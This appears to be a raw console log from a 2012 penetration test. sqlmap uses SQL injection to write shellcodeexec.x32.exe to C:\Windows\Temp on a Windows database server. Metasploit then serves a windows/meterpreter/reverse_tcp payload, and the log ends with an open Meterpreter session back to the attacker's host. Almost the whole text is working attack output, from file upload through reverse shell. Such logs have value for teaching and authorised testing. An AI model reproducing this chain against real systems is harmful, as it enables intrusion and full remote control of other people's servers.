[17:45:54] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/shellcodeexec.x32.exe'
[17:45:54] [INFO] using a custom visual basic script to write the binary file content to file 'C:\Windows\Temp\shellcodeexec.x32.exe', please wait..
[17:46:07] [INFO] do you want confirmation that the file 'C:\Windows\Temp\shellcodeexec.x32.exe' has been successfully written on the back-end DBMS file system? [Y/n] Y
[17:46:07] [INFO] the file has been successfully written and its size is 6656 bytes, same size as the local file '/pentest/database/sqlmap/extra/shellcodeexec/windows/shellcodeexec.x32.exe'
[17:46:08] [INFO] running Metasploit Framework command line interface locally, please wait..
[*] The initial module cache will be built in the background, this can take 2-5 minutes...

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 939 exploits - 501 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15798 updated 36 days ago (2012.08.30)

Warning: This copy of the Metasploit Framework was last updated 36 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 37597
LHOST => xyz
[*] Started reverse handler on xyz:37597
[*] Starting the payload handler...
[17:46:49] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Sending stage (764928 bytes) to xyz
[*] Meterpreter session 1 opened (xyz:37597 -> abc:4189) at 2012-10-05 17:46:57 +0530

meterpreter >